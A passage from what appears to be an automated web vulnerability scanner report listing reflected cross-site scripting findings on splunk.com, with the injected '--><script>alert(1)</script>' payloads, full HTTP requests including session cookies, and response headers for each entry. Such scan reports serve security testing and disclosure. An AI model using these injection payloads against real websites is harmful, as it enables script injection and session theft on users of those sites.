HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:59 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:59 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:59 GMT; path=/ ETag: f23fcd210c1e7061db40414e53e7be971296944339 Last-Modified: Sat, 05 Feb 2011 22:18:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 10d0b--><script>alert(1)</script>55607590eb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support/SP-CAAAAFV10d0b--><script>alert(1)</script>55607590eb7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:19:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:49:30 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:49:30 GMT; path=/ ETag: 972ef7a2a946758d747a5526d43fad9f1296944370 Last-Modified: Sat, 05 Feb 2011 22:19:30 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.619. http://www.splunk.com/view/support/SP-CAAAAFV [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/support/SP-CAAAAFV
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload db595--><script>alert(1)</script>63c414c791d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support/SP-CAAAAFV?db595--><script>alert(1)</script>63c414c791d=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:34 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload bd8a4--><script>alert(1)</script>2275a3e00fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewbd8a4--><script>alert(1)</script>2275a3e00fd/what-is-it-data/SP-CAAACDC HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:20 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:20 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:20 GMT; path=/ ETag: e4ee4f1244fdd6e178efa68fdb03fd1a1296944120 Last-Modified: Sat, 05 Feb 2011 22:15:20 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 1761d--><script>alert(1)</script>b16b03dcf08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/what-is-it-data1761d--><script>alert(1)</script>b16b03dcf08/SP-CAAACDC HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:52 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:52 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:52 GMT; path=/ ETag: 48a40b9ca2cc3a77d477ae78367a5b681296944152 Last-Modified: Sat, 05 Feb 2011 22:15:52 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload c0775--><script>alert(1)</script>a2476226cd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/what-is-it-data/SP-CAAACDCc0775--><script>alert(1)</script>a2476226cd3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.623. http://www.splunk.com/view/what-is-it-data/SP-CAAACDC [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/what-is-it-data/SP-CAAACDC
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a6428--><script>alert(1)</script>cd800798b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/what-is-it-data/SP-CAAACDC?a6428--><script>alert(1)</script>cd800798b9b=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:38 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: bc078e39acedd5051b0e60c2687053921296944079 Last-Modified: Sat, 05 Feb 2011 22:14:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 15d4f--><script>alert(1)</script>9419c5af0ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view15d4f--><script>alert(1)</script>9419c5af0ea/whats-new/SP-CAAAFD2 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:35 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:35 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:35 GMT; path=/ ETag: 9df4af1a1593f2ff86f93d08767566901296944076 Last-Modified: Sat, 05 Feb 2011 22:14:36 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 5dd55--><script>alert(1)</script>a9ce0ced2e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/whats-new5dd55--><script>alert(1)</script>a9ce0ced2e1/SP-CAAAFD2 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:11 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:12 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:12 GMT; path=/ ETag: 4fe12a239c14277a741318813ae441771296944112 Last-Modified: Sat, 05 Feb 2011 22:15:12 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 4887d--><script>alert(1)</script>55ee778f148 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/whats-new/SP-CAAAFD24887d--><script>alert(1)</script>55ee778f148 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:46 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:46 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:46 GMT; path=/ ETag: 6ee65ca7b28522862124d992cced6c2d1296944146 Last-Modified: Sat, 05 Feb 2011 22:15:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.627. http://www.splunk.com/view/whats-new/SP-CAAAFD2 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/whats-new/SP-CAAAFD2
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 581fe--><script>alert(1)</script>7e2759d06a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/whats-new/SP-CAAAFD2?581fe--><script>alert(1)</script>7e2759d06a7=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:59 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: d42be96bfaed903e63bc16d7304816981296944040 Last-Modified: Sat, 05 Feb 2011 22:14:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload b7936--><script>alert(1)</script>598904f8a80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
